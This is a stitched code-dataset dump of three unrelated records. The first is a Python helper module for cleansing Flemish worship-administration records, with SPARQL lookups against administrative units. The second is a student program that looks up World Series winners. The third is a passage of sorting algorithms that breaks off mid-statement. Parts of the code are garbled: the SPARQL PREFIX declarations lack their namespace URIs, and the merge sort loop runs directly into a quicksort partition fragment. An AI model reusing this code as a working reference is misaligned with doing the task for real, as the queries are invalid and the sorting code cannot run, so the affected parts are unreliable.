?kbo_id generiek:lokaleIdentificator ?central_kbo .\n # 'central_kbo': Literal(central_kbo, datatype=XSD.string)\n\n namespaces = {\n 'generiek': 'https://data.vlaanderen.be/ns/generiek#',\n 'skos': SKOS,\n 'adms': 'http://www.w3.org/ns/adms#'\n }\n\n bindings = {\n 'central_name': Literal(central_name, datatype=XSD.string),\n 'central_titel': Literal(central_titel, datatype=XSD.string), \n }\n\n qres = central_graph.query(query, initNs = namespaces, initBindings = bindings)\n\n if qres.bindings:\n concept = qres.bindings[0]['central']\n \n return concept\n \ndef load_graph(name):\n cl = Graph()\n\n cl.parse(f'input/codelists/{name}.ttl', format='ttl')\n\n return cl\n\ndef get_concept_id(graph, label):\n concept = None\n \n qres = graph.query('SELECT ?concept WHERE { ?concept skos:prefLabel ?label .}',\n initNs = { \"skos\": SKOS }, initBindings={'label': Literal(label)})\n\n if qres.bindings:\n concept = qres.bindings[0]['concept']\n \n return concept\n\ndef get_location_id(graph, label, level):\n concept = None\n\n qres = graph.query(\"\"\"SELECT ?loc WHERE { ?loc rdfs:label ?label; ext:werkingsgebiedNiveau ?level. }\"\"\",\n initNs = { \"rdfs\": RDFS, \"ext\": \"http://mu.semte.ch/vocabularies/ext/\" }, initBindings={'label': Literal(label, datatype=XSD.string), 'level': Literal(level, datatype=XSD.string)})\n\n if qres.bindings:\n concept = qres.bindings[0]['loc']\n\n return concept\n\ndef get_label_role(role):\n label_role_dict = {'voorzitter worship':'Voorzitter van het bestuur van de eredienst', 'voorzitter central': 'Voorzitter van het centraal bestuur van de eredienst', \n 'secretaris worship': 'Secretaris van het bestuur van de eredienst', 'secretaris central': 'Secretaris van het centraal bestuur van de eredienst', \n 'penningmeester worship': 'Penningmeester van het bestuur van de eredienst', 'lid worship': 'Bestuurslid van het bestuur van de eredienst', \n 'lid central': 'Bestuurslid van het centraal bestuur van de eredienst'}\n\n return label_role_dict[role]\n\ndef space_cleansing(space):\n return re.sub(r'\\s', '', space)\n\ndef naam_contact_cleansing(naam_contact):\n naam_contact_cleansed = comment = np.nan\n\n if naam_contact != 'nan':\n naam_contact = naam_contact.strip().title()\n\n if re.match(r'^[a-zA-ZàáâäãåąčćęèéêëėįìíîïłńòóôöõøùúûüųūÿýżźñçčšžÀÁÂÄÃÅĄĆČĖĘÈÉÊËÌÍÎÏĮŁŃÒÓÔÖÕØÙÚÛÜŲŪŸÝŻŹÑßÇŒÆČŠŽ∂ð \\'’-]+$', naam_contact):\n naam_contact_cleansed = naam_contact\n else: \n comment = 'Wrong naam format. Check it.'\n\n return [naam_contact_cleansed, comment]\n\ndef referentieorganisatie_cleansing(referentieorganisatie):\n return re.sub(r'\\s', '', referentieorganisatie)\n\ndef split_house_bus_number(house_bus_number):\n house_number = bus_number = np.NaN\n comment = []\n house_bus_number = house_bus_number.replace(' ', '')\n\n if ('z/n' not in house_bus_number and 'nan' not in house_bus_number) : \n if ('bus' in house_bus_number or '/' in house_bus_number):\n comment.append('Splitting. 
Check it.')\n if ('bus' in house_bus_number) : \n split = house_bus_number.split('bus')\n else :\n split = house_bus_number.split('/')\n house_number = split[0]\n bus_number = split[1]\n else:\n house_number = house_bus_number\n house_number = house_number.replace('/', '').replace('-', '').replace(',', '').replace(';', '')\n \n return [house_number, bus_number, ' - '.join(comment)]\n\ndef postcode_cleansing(postcode):\n postcode_cleansed = comment = np.NaN\n\n if str(postcode) != str(np.nan):\n if re.search(r'\\b[^\\d\\W]+\\b', postcode):\n postcode_extract = re.sub(r'\\D', '', postcode)\n comment = \"Wrong postcode format. Check it.\"\n postcode_cleansed = postcode_extract.strip()\n elif re.match(r'\\d{4}', postcode):\n postcode_cleansed = postcode\n else:\n comment = 'No postcode found.'\n\n return [postcode_cleansed, comment]\n\ndef gemeente_cleansing(city):\n gemeente_cleansed = comment = np.nan\n sl = None\n\n if city != 'nan':\n if ' (' in city:\n sl = city.split(' (')\n elif '(' in city:\n sl = city.split('(')\n elif '-' in city:\n sl = city.split('-')\n\n if sl != None:\n if is_municipality(sl[0]):\n gemeente_cleansed = sl[0]\n else:\n comment = \"Municipality Not Found\"\n else:\n if is_municipality(city):\n gemeente_cleansed = city\n else:\n comment = \"Municipality Not Found\"\n\n return [gemeente_cleansed, comment]\n \ndef find_city_province(city):\n return GP[GP['Gemeente'].str.fullmatch(city)]\n\ndef provincie_cleansing(row):\n provincie_cleansed = comment = np.nan\n\n city = row[row.index[0]]\n province = row[row.index[1]]\n \n if city != 'nan':\n result = find_city_province(city)\n \n if len(result) > 0:\n if str(result.iloc[0]['Provincie']).lower().strip() != province.lower().strip():\n provincie_cleansed = result.iloc[0]['Provincie'].strip().title()\n comment = \"Different Province\"\n else:\n provincie_cleansed = province\n else:\n provincie_cleansed = province\n comment = \"Municipality Not Found\"\n elif province != 'nan':\n provincie_cleansed = province\n comment = \"Municipality Empty\"\n\n return [provincie_cleansed, comment]\n\ndef mail_cleansing(mail):\n mail_cleansed = comment = np.nan\n\n if str(mail) != 'nan':\n if re.match(r'[\\w\\.-]+@[\\w\\.-]+(\\.[\\w]+)+', mail):\n mail_cleansed = mail\n else: \n comment = 'Wrong mail format. Check it.'\n\n return [mail_cleansed, comment]\n\ndef split_mail(mail):\n mail_voorzitter = mail_voorzitter_comment = mail_secretaris = mail_secretaris_comment = np.nan\n\n mails = []\n if str(mail) != 'nan':\n if 'V:' in mail:\n mail_voorzitter = mail[mail.find(\"V\")+2:mail.find(\"S\")].strip()\n mail_secretaris = mail[mail.find(\"S\")+2:].strip()\n if ';' in mail:\n mails = mail.split(';')\n elif ' ' in mail:\n mails = mail.split(' ')\n else:\n mail_voorzitter = mail\n\n if len(mails) > 0:\n mail_voorzitter = mails[0].strip()\n mail_secretaris = mails[1].strip()\n\n mail_voorzitter, mail_voorzitter_comment = mail_cleansing(mail_voorzitter)\n\n if str(mail_secretaris) != 'nan' or len(mail_secretaris) > 0:\n mail_secretaris, mail_secretaris_comment = mail_cleansing(mail_secretaris)\n\n return [mail_voorzitter, mail_voorzitter_comment, mail_secretaris, mail_secretaris_comment]\n\ndef website_cleansing(website):\n website_cleansed = comment = np.nan\n\n if website != 'nan':\n if re.match(r'https?:\\/\\/(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,4}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)', website):\n website_cleansed = website\n else: \n comment = 'Wrong website format. 
Check it.'\n\n return [website_cleansed, comment]\n\ndef telephone_number_cleansing(telephone_number):\n telephone_number = re.sub(r'\s', '', telephone_number)\n\n telephone_number = re.sub(r'tel:', '', telephone_number)\n telephone_number = re.sub(r'tel', '', telephone_number)\n telephone_number = re.sub('\xa0', '', telephone_number) # assumed: the original pattern was lost to extraction garbling; a stray non-breaking space is the most likely target\n\n telephone_number = re.sub(r'^\+32-\(0\)', '0', telephone_number)\n telephone_number = re.sub(r'^\+32', '0', telephone_number)\n telephone_number = re.sub(r'^32', '0', telephone_number)\n\n telephone_number = re.sub(r'^\+0032-\(0\)', '0', telephone_number)\n telephone_number = re.sub(r'^0032-\(0\)', '0', telephone_number)\n telephone_number = re.sub(r'^0032', '0', telephone_number)\n\n telephone_number = re.sub(r'^\(\d\d\d\)', '0', telephone_number)\n telephone_number = re.sub(r'^0\(\d\d\d\)', '0', telephone_number)\n\n telephone_number = re.sub(r'[\.a-zA-Z]', '', telephone_number)\n\n return split_telephone_number(telephone_number)\n\ndef split_telephone_number(telephone_number):\n telephone_number_1 = telephone_number_2 = np.nan\n comment = []\n\n split = [telephone_number]\n if '//' in telephone_number:\n split = telephone_number.split('//')\n elif '-' in telephone_number:\n split = telephone_number.split('-')\n elif ';' in telephone_number:\n split = telephone_number.split(';')\n elif 'enGSM:' in telephone_number:\n split = telephone_number.split('enGSM:')\n\n split[0] = split[0].replace('/', '')\n\n if telephone_number != '':\n if check_telephone_number_length(split[0]):\n telephone_number_1 = split[0]\n else:\n comment.append('Wrong telephone number length. Check it.')\n\n if len(split) == 2:\n comment.append('Splitting. Check it.')\n split[1] = split[1].replace('/', '')\n if check_telephone_number_length(split[1]):\n telephone_number_2 = split[1]\n else:\n comment.append('Wrong telephone number 2 length. Check it.')\n\n return [telephone_number_1, telephone_number_2, ' - '.join(comment)]\n\ndef check_telephone_number_length(telephone_number):\n # Normalised Belgian numbers have 9 (landline) or 10 (mobile) digits.\n return 9 <= len(telephone_number) <= 10\n\ndef kbo_cleansing(kbo):\n\n kbo_cleansed = comment = np.nan\n\n if str(kbo) != str(np.nan):\n kbo = re.sub(r'\D', '', kbo)\n if re.match(r'\d{10}', kbo):\n kbo_cleansed = kbo\n elif re.match(r'\d{6,9}', kbo):\n kbo_cleansed = kbo\n comment = f'Only {len(kbo)} digits. Missing some digits?'\n else: \n comment = 'Wrong KBO format. 
Check it.'\n else :\n comment = 'No KBO nr found'\n\n return [kbo_cleansed, comment]\n\ndef load_possible_first_names():\n # using statbel firstnames of newborns (heuristic)\n m = pd.read_excel('input/Voornamen_Jongens_1995-2017_0.xls', sheet_name='1995-2019')\n male_names = (m['Unnamed: 1'].append(m['Unnamed: 4']).append(m['Unnamed: 7']).append(m['Unnamed: 10'])).unique()\n f = pd.read_excel('input/Voornamen_meisjes_1995-2017.xls', sheet_name='1995-2019')\n female_names = (f['Unnamed: 1'].append(f['Unnamed: 4']).append(f['Unnamed: 7']).append(f['Unnamed: 10'])).unique()\n\n manual_entries = ['Friedo', 'Renilde', 'Jozef', 'Maria-André', 'Gedo', 'Yvo', 'Marie-Cecile', 'Fonny', 'Luciaan', 'Willy', 'Fredy']\n\n first_names = np.concatenate([male_names,female_names, manual_entries])\n\n first_names = np.delete(first_names, np.where(first_names == 'Van'))\n first_names = np.delete(first_names, np.where(first_names == 'Blomme'))\n\n return first_names\n\ndef is_known_first_name(potential_name, first_names):\n return potential_name in first_names\n\ndef remove_title(full_name):\n mv = re.compile('(mevr|dhr)[\\.]?[\\s]?', re.IGNORECASE)\n return mv.sub('', full_name)\n\ndef splitname(full_name, first_names):\n first = last = np.nan\n comment = []\n\n if 'verkozen' in full_name or 'vacature nog open' in full_name or 'vacant' in full_name:\n comment = 'Vacant position'\n return [first, last, comment]\n \n likely_last_names = ['Vos', 'Matthijs', 'Stevens', 'Maere', 'Rubens', 'Beer', 'Duran', 'Roos', 'Broos', 'Thijs', 'Perre', 'Joris', 'Winter', 'Claus', 'Thys', 'Massa', 'Roy']\n\n if ';' in full_name:\n split = remove_title(full_name).split(';')\n\n first = split[0]\n last = split[1]\n else:\n split = remove_title(full_name).split(' ')\n\n if len(split) == 1:\n comment.append('Cannot split name')\n\n potential_first_last = is_known_first_name(split[0], first_names)\n potential_last_first = is_known_first_name(split[-1], first_names)\n\n if potential_first_last and potential_last_first:\n if split[-1] in likely_last_names:\n first = split[0]\n last = ' '.join(split[1:])\n elif split[0] in likely_last_names:\n first = split[-1]\n last = ' '.join(split[0:-1])\n comment.append('Ambiguous: two possible first names - {}'.format(full_name))\n first = full_name\n elif potential_first_last:\n first = split[0]\n last = ' '.join(split[1:])\n elif potential_last_first:\n first = split[-1]\n last = ' '.join(split[0:-1])\n else:\n comment.append('No potential first name found - {}'.format(full_name))\n first = full_name\n # print([full_name])\n return [str(first).strip(), str(last).strip(), ' - '.join(comment)]\n\ndef decretale_functie_cleasing(decretale):\n decretale_functie = functionaris_status = np.nan\n\n if 'Waarnemend' in decretale:\n status = decretale[decretale.find(\"(\"):decretale.find(\")\")+1]\n decretale_functie = decretale.replace(status, '').strip()\n functionaris_status = 'Waarnemend'\n elif 'GEEN of ONBEKEND' in decretale:\n decretale_functie = np.nan\n else:\n decretale_functie = decretale.strip()\n functionaris_status = 'Effectief'\n\n return [decretale_functie, functionaris_status]\n\ndef find_resulting_org(orgs, name, type_entiteit):\n if name == 'Puurs Sint-Amands':\n return orgs[(orgs['Unieke Naam'].str.contains('PUURS_SINT_AMANDS', flags=re.IGNORECASE, regex=True, na=False)) & (orgs['Organisatiestatus'] == 'Actief') & (orgs['Type Entiteit'] == type_entiteit)]\n elif type_entiteit == 'Gemeente':\n return orgs[(orgs['Unieke Naam'].str.contains('G_' + name, flags=re.IGNORECASE, regex=True, 
na=False)) & (orgs['Organisatiestatus'] == 'Actief')]\n else:\n return orgs[(orgs['Unieke Naam'].str.contains('O_' + name, flags=re.IGNORECASE, regex=True, na=False)) & (orgs['Organisatiestatus'] == 'Actief')]\n\ndef org_status_cleansing(orgs):\n orgs['Resulting organisation'] = None\n\n for index, row in orgs[orgs['Organisatiestatus'] == 'gefusioneerd'].iterrows():\n if str(row['Opmerkingen ivm Organisatie']).startswith('Fusie'):\n resulting_city = row['Opmerkingen ivm Organisatie'].split('tot')[-1].strip()\n obj_resulting_org = find_resulting_org(orgs, resulting_city, row['Type Entiteit'])\n orgs.at[index, 'Resulting organisation'] = str(obj_resulting_org.iloc[0]['KBOnr_cleansed'])\n\n return orgs\n\ndef date_cleansing(date):\n dates_parsed = []\n\n if date != str(np.nan): \n match = re.findall(r'\\d{1,2}.\\d{1,2}.\\d{2,4}', date)\n if match:\n for m in match:\n date_parsed_match = dateparser.parse(m, settings={'DATE_ORDER': 'DMY'})\n if date_parsed_match != None:\n dates_parsed.append(date_parsed_match.isoformat())\n\n match = re.findall(r'\\d{1,2} \\w* \\d{2,4}', date)\n if match:\n for m in match:\n date_parsed_match = dateparser.parse(m, settings={'DATE_ORDER': 'DMY'}, languages=['nl'])\n if date_parsed_match != None:\n dates_parsed.append(date_parsed_match.isoformat())\n\n return dates_parsed\n\ndef voting_cleansing(date):\n date_cleansed = comment = np.nan\n\n if date != str(np.nan):\n dates_parsed = date_cleansing(date)\n\n if dates_parsed:\n date_cleansed = dates_parsed[0]\n if len(dates_parsed) > 1:\n comment = ' - '.join([str(date) for date in dates_parsed[1:]])\n else:\n comment = 'Wrong date format. Check it.'\n\n return [date_cleansed, comment]\n\n# final data will be [municipality_name:number]\ndef extract_area_percentage(data):\n m_p = []\n m_p.append(re.search(r'[a-zA-Z]+(\\-[a-zA-Z]+)*', data).group())\n\n if re.search(r'\\d+(\\,?\\d+)?', data):\n m_p.append(float(re.search(r'\\d+(\\,?\\.?\\d+)?', data).group().replace(',', '.')))\n else:\n m_p.append(0)\n \n return m_p\n\ndef is_municipality(municipality):\n res = find_city_province(municipality)\n\n if len(res) > 0:\n return True\n else:\n return False\n\ndef local_engagement_cleansing(row):\n division = {'Province': {}, 'Municipality': {}, 'Cross-Border': []}\n sl = None\n info = row['Opmerkingen_EB']\n cross_border = row['Grensoverschrijdend']\n province = row['Provincie Cleansed']\n municipality = row['Gemeente Cleansed']\n type_eredienst = row['Type_eredienst Cleansed']\n\n #{'Province': {'sds': 12, 'ss': 12}, 'Municipality': {'zze': 12}, 'Cross-Border': []} \n\n if type_eredienst == \"Islamitisch\" or type_eredienst == \"Orthodox\":\n if not cross_border and province != 'nan':\n division['Province'][province] = 100\n division['Cross-Border'].append(province)\n elif cross_border and info != 'nan':\n match = re.sub(r'\\ben\\b', ';', info)\n match = re.sub(r'Gebiedsomschrijving: ', '', match)\n sl = match.split(';')\n\n if len(sl) == 2:\n for data in sl:\n mp = extract_area_percentage(data)\n\n division['Province'][mp[0]] = mp[1]\n division['Cross-Border'].append(mp[0])\n else:\n division['Province'][province] = 0\n division['Cross-Border'].append(province)\n \n for data in sl:\n mp = extract_area_percentage(data)\n \n if is_municipality(mp[0]):\n division['Cross-Border'].append(mp[0])\n division['Municipality'][mp[0]] = mp[1]\n else:\n if not cross_border and municipality != 'nan':\n division['Municipality'][municipality] = 100\n division['Cross-Border'].append(municipality)\n elif cross_border and info != 'nan':\n 
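# added example (invented dates): date_cleansing above relies on the
# dateparser package; with DATE_ORDER='DMY' both numeric and Dutch long forms
# resolve to the same ISO timestamp:
import dateparser

assert dateparser.parse('21/07/2019', settings={'DATE_ORDER': 'DMY'}).isoformat().startswith('2019-07-21')
assert dateparser.parse('21 juli 2019', languages=['nl']).isoformat().startswith('2019-07-21')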
match = re.sub(r'\\ben\\b', ';', info)\n\n # gebiedsomschrijving or Gebiedsomschrijving or gebiedsopmschrijving\n if 'mschrijving' in match:\n match = re.sub(r'(Zelfbedruipend - )?([gG]ebiedso[p]?mschrijving)', '', match)\n \n if ';' in match:\n sl = match.split(';')\n elif ', ' in info:\n sl = match.split(', ')\n elif ' - ' in info:\n sl = match.split(' - ')\n else:\n sl = match\n elif 'Gebiedsverdeling' in match:\n match = re.sub(r'(Vroeger:)?(Gebiedsverdeling:)', '', match)\n sl = match.split(';')\n elif 'Verdeelsleutel' in match:\n match = re.sub(r'(Verdeelsleutel:)', '', match)\n sl = match.split(', ')\n else:\n if ' - ' in match:\n sl = match.split(' - ')\n elif ', ' in match:\n sl = match.split(', ')\n elif ';' in match:\n sl = match.split(';')\n elif re.search(r'\\d+(\\,?\\d+)?', match):\n sl = match\n else:\n sl = None\n \n if sl != None:\n if isinstance(sl, list):\n for data in sl:\n mp = extract_area_percentage(data)\n \n if is_municipality(mp[0]):\n division['Municipality'][mp[0]] = mp[1]\n division['Cross-Border'].append(mp[0])\n else:\n mp = extract_area_percentage(sl)\n if is_municipality(mp[0]):\n division['Municipality'][mp[0]] = mp[1]\n division['Cross-Border'].append(mp[0])\n \n \n return str(division)\n\ndef mapping_change_event_type_worship(status):\n change_event_dict = {'Erkenningsaanvraag in behandeling': 'Erkenning aangevraagd', 'Niet actief - Samengevoegd (overgenomen)': 'Samenvoeging',\n 'Operationeel - Samengevoegd (met behoud van naam)': 'Samenvoeging', 'Niet actief - Samengevoegd (nieuwe entiteit)': 'Samenvoeging',\n 'Operationeel - Samengevoegd (met nieuwe naam)': 'Samenvoeging', 'Niet actief - Erkenning niet toegestaan': 'Erkenning niet toegekend',\n 'Niet actief - Ingetrokken': 'Erkenning opgeheven'}\n \n return [change_event_dict[status]]\n\ndef extract_change_event(status_info):\n result_changes = []\n matchs = {'Erkend door ': 'Erkenning toegekend', 'Koninklijke erkenning': 'Erkenning toegekend', 'naamswijziging': 'Naamswijziging', \n 'fusie': 'Samenvoeging', 'ebiedsomschrijving': 'Wijziging Gebiedsomschrijving', 'gebiedsuitbreiding': 'Wijziging Gebiedsomschrijving'\n }\n matchs.setdefault('missing_key', '')\n\n for key, value in matchs.items():\n if key in status_info:\n result_changes.append(value)\n \n return result_changes\n\ndef change_event_cleansing(row):\n status = row['Status_EB']\n status_info = row['Statusinfo']\n change_events = dates = np.nan\n\n if status == 'Operationeel' or status == 'Operationeel - Intrekkingsaanvraag lopende' or status == 'Operationeel - Samenvoeging lopende':\n change_events = extract_change_event(status_info)\n dates = date_cleansing(status_info)\n else:\n change_events = mapping_change_event_type_worship(status)\n dates = date_cleansing(status_info)\n\n return str(dict(zip(change_events, dates)))\n\ndef get_full_address(straat, huisnr, busnr, postcode, gemeente):\n full_address = ''\n if straat != str(np.nan):\n full_address += straat + ' '\n if huisnr != str(np.nan):\n full_address += huisnr\n if busnr != str(np.nan):\n full_address += ' '\n else:\n full_address += ', '\n if busnr != str(np.nan):\n full_address += busnr + ', '\n if postcode != str(np.nan):\n full_address += postcode + ' '\n if gemeente != str(np.nan):\n full_address += gemeente\n\n return full_address\n\ndef get_adm_unit_concept(adm_label, classification):\n adm_concept = None\n\n query = \"\"\"\n PREFIX xsd: \n PREFIX besluit: \n PREFIX skos: \n PREFIX mu: \n SELECT ?s ?uuid ?classificatie WHERE {{\n ?s a besluit:Bestuurseenheid; skos:prefLabel 
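# added usage note (assumes extract_area_percentage above is in scope; sample
# input invented): the helper returns [name, percentage], defaulting the
# percentage to 0 and normalising decimal commas to dots. Caveat: the
# [a-zA-Z] name pattern is ASCII-only, so accented municipality names would
# be truncated.
assert extract_area_percentage('Sint-Niklaas 60,5') == ['Sint-Niklaas', 60.5]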
\"{adm_label}\"; mu:uuid ?uuid; besluit:classificatie ?classificatie .\n ?classificatie skos:prefLabel \"{classification}\" .\n }}\n \"\"\".format(adm_label = adm_label, classification = classification)\n \n SPARQL.setQuery(query)\n SPARQL.setReturnFormat(JSON)\n\n results = SPARQL.query().convert()\n \n if len(results['results']['bindings']) > 0:\n adm_concept = results['results']['bindings'][0] \n \n return adm_concept\n\ndef get_all_locations():\n query = \"\"\"\n PREFIX rdfs: \n PREFIX mu: \n PREFIX ext: \n PREFIX prov: \n\n SELECT * { \n ?loc a prov:Location; ?level; mu:uuid ?uuid; rdfs:label ?label\n FILTER (?level in (\"Gemeente\", \"Provincie\"))\n }\n \"\"\"\n\n SPARQL.setQuery(query)\n SPARQL.setReturnFormat(JSON)\n\n results = SPARQL.query().convert()\n\n return results['results']['bindings']\n\n\n# def get_werkingsgebied_concept(label, level):\n# location_concept = None\n\n# query = \"\"\"\n# PREFIX rdfs: \n# PREFIX mu: \n# PREFIX ext: \n# PREFIX prov: \n\n# SELECT * WHERE {{\n# ?s a prov:Location; ext:werkingsgebiedNiveau \"{level}\"; rdfs:label \"{label}\"; mu:uuid ?uuid.\n# }}\n# \"\"\".format(label = label, level = level)\n\n# SPARQL.setQuery(query)\n# SPARQL.setReturnFormat(JSON)\n\n# results = SPARQL.query().convert()\n\n# if len(results['results']['bindings']) > 0:\n# location_concept = results['results']['bindings'][0]\n\n# return location_concept\n\ndef get_all_admin_units():\n query = \"\"\"\n PREFIX xsd: \n PREFIX besluit: \n PREFIX skos: \n PREFIX mu: \n SELECT ?admin_unit ?admin_unit_label ?uuid ?classificatie WHERE {\n ?admin_unit a besluit:Bestuurseenheid; skos:prefLabel ?admin_unit_label; mu:uuid ?uuid; besluit:classificatie ?classificatie .\n ?classificatie skos:prefLabel ?classification_label .\n FILTER (?classification_label in (\"Gemeente\", \"Provincie\"))\n }\n \n \"\"\"\n\n SPARQL.setQuery(query)\n SPARQL.setReturnFormat(JSON)\n\n results = SPARQL.query().convert()\n\n return results['results']['bindings']\n\n\ndef worship_link_ro(row):\n \n type_eredienst = row[row.index[0]]\n province = row[row.index[1]]\n municipality = row[row.index[2]]\n ro_name = np.nan\n\n ro_dict = {'Rooms-Katholiek': [{'name': 'Bisdom Antwerpen', 'province': 'Antwerpen'}, {'name': 'Bisdom Brugge', 'province': 'West-Vlaanderen'},\n {'name': 'Bisdom Gent', 'province': 'Oost-Vlaanderen'}, {'name': 'Bisdom Hasselt', 'province': 'Limburg'},\n {'name': 'Aartsbisdom Mechelen-Brussel', 'province': 'Vlaams-Brabant'}],\n 'Israëlitisch': {'name': 'Centraal Israëlitische Consistorie van België'}, 'Anglicaans': {'name': 'Centraal Comité van de Anglicaanse Eredienst in België'},\n 'Protestants': {'name': 'Administratieve Raad van de Protestants-Evangelische Eredienst (ARPEE)'}, 'Orthodox': {'name':'Oecumenisch Patriarchaat van Konstantinopel'},\n 'Islamitisch': {'name': 'Executief van de Moslims van België'}}\n \n if type_eredienst == 'Rooms-Katholiek':\n if municipality in ['Bonheiden', 'Bornem', 'Duffel', 'Mechelen', 'Puurs-Sint-Amands', 'Sint-Katelijne-Waver', 'Willebroek']:\n ro_name = 'Aartsbisdom Mechelen-Brussel'\n else:\n rks = ro_dict['Rooms-Katholiek']\n for rk in rks: \n if rk['province'] == province:\n ro_name = rk['name']\n elif type_eredienst in ['Israëlitisch', 'Protestants', 'Islamitisch', 'Anglicaans', 'Orthodox']:\n ro_name = ro_dict[type_eredienst]['name']\n\n return ro_name\n\ndef exists_contact_org(row):\n return ((str(row['Website Cleansed']) != str(np.nan)) or (str(row['Algemeen telefoonnr']) != str(np.nan)) or (str(row['Algemeen mailadres']) != str(np.nan)))\n \ndef 
exists_site_org(row):\n return (exists_address(row) or exists_contact_org(row))\n\ndef exists_contact_cont(row):\n return ((str(row['Titel Cleansed']) != str(np.nan)) or (str(row['Mail nr2 Cleansed']) != str(np.nan)) or (str(row['Telefoonnr Contact 1']) != str(np.nan)))\n\ndef exists_role_worship(row, role):\n return (str(row[f'Datum verkiezing {role}']) != str(np.nan) and str(row[f'Naam_{role} Cleansed']) != str(np.nan))\n\ndef exists_mandate_central(row):\n return (str(row['Verkiezingen17_Opmerkingen Cleansed']) != str(np.nan) or str(row['Verkiezingen2020_Opmerkingen Cleansed']) != str(np.nan))\n\ndef exists_given_and_family_name(row, role):\n return (str(row[f'Naam_{role} First']) != str(np.nan)) or (str(row[f'Naam_{role} Last']) != str(np.nan))\n\ndef exists_address(row):\n return ((str(row['Straat']) != str(np.nan)) or (str(row['Huisnr Cleansed']) != str(np.nan)) or (str(row['Busnummer Cleansed']) != str(np.nan)) or\n (str(row['Postcode Cleansed']) != str(np.nan)) or (str(row['Gemeente Cleansed']) != str(np.nan)) or (str(row['Provincie Cleansed']) != str(np.nan)))\n\ndef exists_site_role(row, role):\n return exists_address_role(row, role) or exists_contact_role(row, role)\n\ndef exists_address_role(row, role):\n return (str(row[f'Adres_{role} Cleansed']) != str(np.nan))\n\ndef exists_contact_role(row, role):\n if not 'Lid' in role:\n return ((str(row[f'Tel_{role} 1']) != str(np.nan)) or (str(row[f'Mail_{role} Cleansed']) != str(np.nan)))\n else:\n return False\n\ndef exists_bestuursperiode_central(row):\n #return (str(row[f'Verkiezingen17_Opmerkingen Cleansed']) != str(np.nan) or str(row['Verkiezingen2020_Opmerkingen Cleansed']) != str(np.nan))\n return (str(row[f'Verkiezingen17']) != str(np.nan) or str(row['Verkiezingen2020']) != str(np.nan))\n\ndef exists_bestuursperiode_worship(row, roles):\n for role in roles:\n if exists_role_worship(row, role):\n return True\n \n return False\n\ndef get_cleansed_data(file, type):\n try:\n data_cleansed = pd.read_excel(f'output/{type}_cleansed.xlsx', dtype=str)\n except FileNotFoundError:\n data_raw = pd.read_excel(file, dtype=str)\n \n print(\"########### Cleansing started #############\")\n\n if type == 'worship': \n data_cleansed = worship.main(data_raw)\n elif type == 'central':\n data_cleansed = central.main(data_raw)\n elif type == 'org':\n data_cleansed = organization.main(data_raw)\n else:\n data_cleansed = contact.main(data_raw)\n\n print(\"########### Cleansing finished #############\")\n\n export_df(data_cleansed, type) \n\n return data_cleansed\n\ndef export_data(g, type):\n now = datetime.now().strftime('%Y%m%d%H%M%S')\n g.serialize(f'output/{now}-{type}.ttl',format='turtle')\n\ndef export_df(data, type):\n data.to_excel(f'output/{type}_cleansed.xlsx', index=False)","sub_path":"helper/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":31939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"396735354","text":"# proj5_william_verthein.py\n#\n# This program takes a test file of World Series winners. User enters a year\n# to see which team won that year, and says how many times the team has won.\n#\n# Constant created in case you want to update winners in recent years.\nYEAR_MOST_RECENT = 2009\n\ndef main():\n '''Program creates a dict of years, with corresponding team that won as the value for that year. 
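# added note on the exists_* helpers above: str(value) != str(np.nan) only
# catches values whose string form is exactly 'nan'; for cells read via
# pandas the idiomatic missing-value test is pd.isna:
import numpy as np
import pandas as pd

assert pd.isna(np.nan) and not pd.isna('0471/12.34.56')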
Takes input of a year, returns winning team, and loops through dictionary to get total wins by that team.'''\n\n print('This program will tell you who won the World Series any year you choose.')\n print()\n teams = create_dict()\n entry = get_input()\n win_team, count = winner_eval(entry, teams)\n display_result(win_team, count, entry)\n\n# Create the dictionary of the\ndef create_dict():\n wld_ser_teams = open('WorldSeries.txt', 'r')\n f = wld_ser_teams.read().split('\\n')\n teams = {}\n key = 1903\n val = 0\n while key <= YEAR_MOST_RECENT:\n teams[key] = f[val]\n key += 1\n val += 1\n wld_ser_teams.close()\n return teams\n\n# Create the dict of years and team who won\ndef get_input():\n bad_data = True\n while bad_data == True:\n yr_inpt = input('Enter a year between 1903 and 2009 to see which team won the World Series that year: ')\n try:\n year = int(yr_inpt)\n except:\n print('That is not a valid input. Please enter a numerical year.')\n else:\n if year >= 1903 and year <= YEAR_MOST_RECENT:\n bad_data = False\n return year\n else:\n print('That year is out of range. Be sure to enter a year between 1903 and 2009.')\n\n# Evaluate input to get winning team and how many times they have won.\ndef winner_eval(year, teams):\n winning_team = teams.get(year)\n count = 0\n for team in teams.values():\n if team == winning_team:\n count += 1\n return winning_team, count\n\ndef display_result(winning_team, count, year):\n if year == 1904 or year == 1994:\n print(winning_team, '. There was no winning team.', sep = '')\n elif count == 1:\n print(winning_team, 'won during this year. They had won once over the years.')\n else:\n print(winning_team, 'won during this year. They have won', count, 'times over the years.')\n\nif __name__ == '__main__':\n main()\n","sub_path":"proj5_william_verthein.py","file_name":"proj5_william_verthein.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185524539","text":"#http://interactivepython.org/runestone/static/pythonds/SortSearch/TheSelectionSort.html \ndef selectionSort(alist):\n for fillslot in range(len(alist)-1,0,-1):\n positionOfMax=0\n for location in range(1,fillslot+1):\n if alist[location]>alist[positionOfMax]:\n positionOfMax = location\n\n temp = alist[fillslot]\n alist[fillslot] = alist[positionOfMax]\n alist[positionOfMax] = temp\n\ndef insertionSort(alist):\n for index in range(1,len(alist)):\n\n currentvalue = alist[index]\n position = index\n\n while position>0 and alist[position-1]>currentvalue:\n alist[position]=alist[position-1]\n position = position-1\n\n alist[position]=currentvalue\n\n\ndef mergeSort(alist):\n print(\"Splitting \",alist)\n if len(alist)>1:\n mid = len(alist)//2\n lefthalf = alist[:mid]\n righthalf = alist[mid:]\n\n mergeSort(lefthalf)\n mergeSort(righthalf)\n\n i=0\n j=0\n k=0\n while i= pivotvalue and \\\n rightmark >= leftmark:\n rightmark = rightmark -1\n\n if rightmark < leftmark:\n done = True\n else:\n temp = alist[leftmark]\n alist[leftmark] = alist[rightmark]\n alist[rightmark] = temp\n\n temp = alist[first]\n alist[first] = alist[rightmark]\n alist[rightmark] = temp\n\n return rightmark\n\nalist = 